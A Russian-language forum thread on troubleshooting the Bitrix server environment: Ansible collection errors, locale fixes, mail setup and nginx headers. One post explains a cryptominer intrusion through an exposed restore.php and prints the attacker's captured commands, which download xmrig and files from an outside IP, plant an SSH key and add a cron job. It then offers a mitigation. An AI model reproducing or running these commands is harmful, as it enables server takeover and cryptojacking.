Форум

[QUOTE] написал:
[QUOTE] написал:
Проблема: phphinfo() показывает следующее1 - 7.5.5 битрикс окружение.2 - 9.0.4Вопрос:Что-то делается с вашей стороны чтобы этого не было?[/QUOTE]

Да, там есть такое. Уже третий год пошел как есть. Да и не только в php, в многих местах другого ПО.
Проблемы нет. Надпись не на что не влияет.
Создавать свою репу, пересобирать все версии PHP и их дополнения мы не будем из-за одной надписи.
PS: обращения у нас такие есть, их пара штук...[/QUOTE]
А есть план действий на тот момент когда РКН заблокирует все зеркала REMI?
Или когда все зеркала REMI скажут что "им не комфортно отдавать пакеты в Россию"?

Добрый день.
Проблема: phphinfo() показывает следующее
1 - 7.5.5 битрикс окружение.
2 - 9.0.4

Вопрос:
Что-то делается с вашей стороны чтобы этого не было?

[QUOTE] написал:
[QUOTE] написал:
Установить "руками" необходимые коллеции:
ansible-galaxy collection install community.general:==8.5.0
ansible-galaxy collection install community.mysql:==3.9.0
ansible-galaxy collection install community.rabbitmq:==1.3.0[/QUOTE]

А как так вышло что их нет? Поясните сценарий? Сломали их руками специально?[/QUOTE]
Симптом в  "10. Background pool tasks":
------------------------------------------------------------------------------------------------------
TaskID                    | Started at                |          Status | Last Step
------------------------------------------------------------------------------------------------------
site_create_1687038046    | 10/12/2024 11:53          |       interrupt |

Что именно случилось:
На VPS с CentOS-9 создаваемых в nic.ru что-то не так с локалями.

Лечение:

dnf install -y glibc-locale-source
localedef --no-archive -i en_US -f UTF-8 en_US.UTF-8
export LANG=en_US.UTF-8

Только после этого можно устанавливать "коллекции"  ansible.

Не понятно.
Вот кусок хистори:
sestatus
dnf -y update
dnf -y install epel-release  mc wget tmux net-tools htop postfix vsftpd links jwhois s-nail bind-utils apg
dnf clean all && dnf -y update
cd ~
wget [URL=http://repo.bitrix.info/dnf/bitrix-env-9.sh]http://repo.bitrix.info/dnf/bitrix-env-9.sh[/URL] && chmod +x bitrix-env-9.sh && ./bitrix-env-9.sh
~/menu.sh

При установке в консоль ни о каких ошибках не написало.
Пул успешно создался.
Тем не менее никакие задачи не выполнялись.
Вот часть из задач:
10 tasks have been found.
------------------------------------------------------------------------------------------------------
TaskID                    | Started at                |          Status | Last Step
------------------------------------------------------------------------------------------------------
...
php_ext_6700748666        | 07/11/2024 15:54          |        finished | play|complete
site_certificate_3671482600 | 07/11/2024 15:27          |       interrupt |
site_create_3501118362    | 07/11/2024 15:23          |           error | play|complete
common_1256340727         | 07/11/2024 15:22          |        finished | play|complete
------------------------------------------------------------------------------------------------------
в промежутке  15:27 - 15:54   понял что не так и установил коллеции.

[QUOTE] написал:
9.0.3
Любая задача останавливается в статусе interrupt.
Например /opt/webdir/temp/site_certificate_3671482600/status:
TASK [Gathering ERROR! couldn't resolve module/action 'community.general.git_config'. This often indicates a misspelling, missing collection, or incorrect module path.

The error appears to be in '/etc/ansible/roles/web/tasks/configure_le.yml': line 39, column 3, but may
be elsewhere in the file depending on the exact syntax problem.

The offending line appears to be:


- name: add dehydrated dir as safe directory global git option in .gitconfig
 ^ here
: include variables from temporary config] ***************************

Куда копать?[/QUOTE]
Лечится следующим образом:
Установить "руками" необходимые коллеции:
ansible-galaxy collection install community.general:==8.5.0
ansible-galaxy collection install community.mysql:==3.9.0
ansible-galaxy collection install community.rabbitmq:==1.3.0

9.0.3
Любая задача останавливается в статусе interrupt.
Например /opt/webdir/temp/site_certificate_3671482600/status:
TASK [Gathering ERROR! couldn't resolve module/action 'community.general.git_config'. This often indicates a misspelling, missing collection, or incorrect module path.

The error appears to be in '/etc/ansible/roles/web/tasks/configure_le.yml': line 39, column 3, but may
be elsewhere in the file depending on the exact syntax problem.

The offending line appears to be:


- name: add dehydrated dir as safe directory global git option in .gitconfig
 ^ here
: include variables from temporary config] ***************************

Куда копать?

1. Создайте "руками" /home/bitrix/.msmtprc и пропишите туда параметры.
2. Проверьте "руками" отсылку почты с помощью msmtp

Например:
[URL=https://www.acrit-studio.ru/pantry-programmer/knowledge-base/pochta/nastroyka-msmtp-dlya-raboty-s-yandeks-pochtoy-i-gmail/]https://www.acrit-studio.ru/pantry-programmer/knowledge-base/pochta/nastroyka-msmtp-dlya-raboty-s-ya...[/URL]

Но в принципе не понятно почему надо использовать gmail в нынеших условиях.

[QUOTE] написал:
[QUOTE] написал:
Вы не учитываете тот случай, когда вирус может находится в программах вашего компьютера, например, файловый менеджер и так далее.[/QUOTE]
Еще раз.
Получил образ оф. BitrixVM, Арендовал хост, Развернул полученный образ без каких-либо изменений в конфигурацию. На сайт не заходили, На хостинг не заходили, На сервер не заходили.
Залился майнер. Почистил через консоль на хостинге, никаких файловых менеджеров winscp, ssh и прочего. Вышел. Прошла неделя майнер снова там.[/QUOTE]
Возможно еще актуально.
При установке битрикс-окружения в /home/bitrix/www  появляются restore.php и bitrixsetup.php
Они же создаются при создании сайта средствами /root/menu.sh
Файл restore.php позволяет восстановить из предварительно созданного бэкапа сайт.
Для развертывания никаких логинов паролей (в том числе и от пользователя сервера баз данных) не надо.

Что происходит?
Приходит робот из облака гугла или амазона.
Видит restore.php.
Разворачивает заранее сделанную копию сайта.
Идет в админку.
Это его сайт и у него есть возможность попасть в админку.
Запускает "командную строку php"
В ней:
echo shell_exec("cat /proc/cpuinfo | grep processor");
echo shell_exec("cat /proc/cpuinfo | grep model");
echo shell_exec("sudo -l");
echo shell_exec("curl -O [URL=http://178.154.215.30/auth_login)]http://178.154.215.30/auth_login")[/URL];
echo shell_exec("mv auth_login auth_login.php");
echo shell_exec("ls /home/bitrix/www/bitrix/admin/ | grep auth_login.php");
echo shell_exec("cp /home/bitrix/www/bitrix/admin/auth_login.php /home/bitrix/www/");
echo shell_exec("ls /home/bitrix/www/ | grep auth_login.php");
echo shell_exec("curl -o /tmp/config.json [URL=http://178.154.215.30/config.json)]http://178.154.215.30/config.json")[/URL];
echo shell_exec("curl -o /tmp/xmrig [URL=http://178.154.215.30/xmrig)]http://178.154.215.30/xmrig")[/URL];
echo shell_exec("chmod 777 /tmp/xmrig");
echo shell_exec("mkdir /home/bitrix/.ssh");
echo shell_exec("curl -O [URL=http://178.154.215.30/info)]http://178.154.215.30/info")[/URL];
echo shell_exec("cat info >> ~/.ssh/authorized_keys");
echo shell_exec("rm -rf info ");
echo shell_exec("curl -o /home/bitrix/sql_backup.sql [URL=http://178.154.215.30/sql_backup)]http://178.154.215.30/sql_backup")[/URL];
echo shell_exec("chmod 777 /home/bitrix/sql_backup.sql");
echo shell_exec("curl -O [URL=http://178.154.215.30/conf)]http://178.154.215.30/conf")[/URL];
echo shell_exec("crontab -l >> conf");
echo shell_exec("crontab conf");
echo shell_exec("rm -rf conf");
echo shell_exec("crontab -l");
После этого:
$ crontab -l
# kletka-gym project
*/10 * * * * bash /home/bitrix/sql_backup.sql
а там внутри
wget -P /tmp [URL=https://github.com/.../xmrig-6.16.2-linux-static-x64.tar.gz]https://github.com/.../xmrig-6.16.2-linux-static-x64.tar.gz[/URL]
И еще чуть-чуть конфигов.

Вот как-то так.
Снято в 22 году с работающего майнера.
Замечу что в  данном случае после
echo shell_exec("cat info >> ~/.ssh/authorized_keys");
не хватает chmod 700 для .ssh и chmod 600 для authorized_keys
Для получения ssh по ключу.
Тогда майнер был не доработан.

Возникает вопрос что делать?
После установки битрикс-окружения/развертывания bitrix-vm
cd /home/bitrix/www
mv bitrixsetup.php bitrixsetup.php.1
mv restore.php restore.php.1

То же самое делать сразу же после создания сайта в его web_root.

Не совсем так.
Добавляем 2 файла:
/etc/nginx/bx/site_settings/<site.name>/x-frame-options.conf                                                                                                                                                                                                                                          
[CODE]add_header X-Frame-Options $frame_options;[/CODE]
/etc/nginx/bx/maps/frame_options.conf                                                                                                                                                                                                                                                                  
[CODE]map $http_referer $frame_options {
    "~<site>\.<name>"                               ""              ;
    "~webvisor\.com"                                ""              ;
    "~yandex\.com"                                  ""              ;
    "~metri[ck]a\.yandex\.(com|ru|by|com\.tr)"      ""              ;
    default                                         "SAMEORIGIN"    ;
}[/CODE]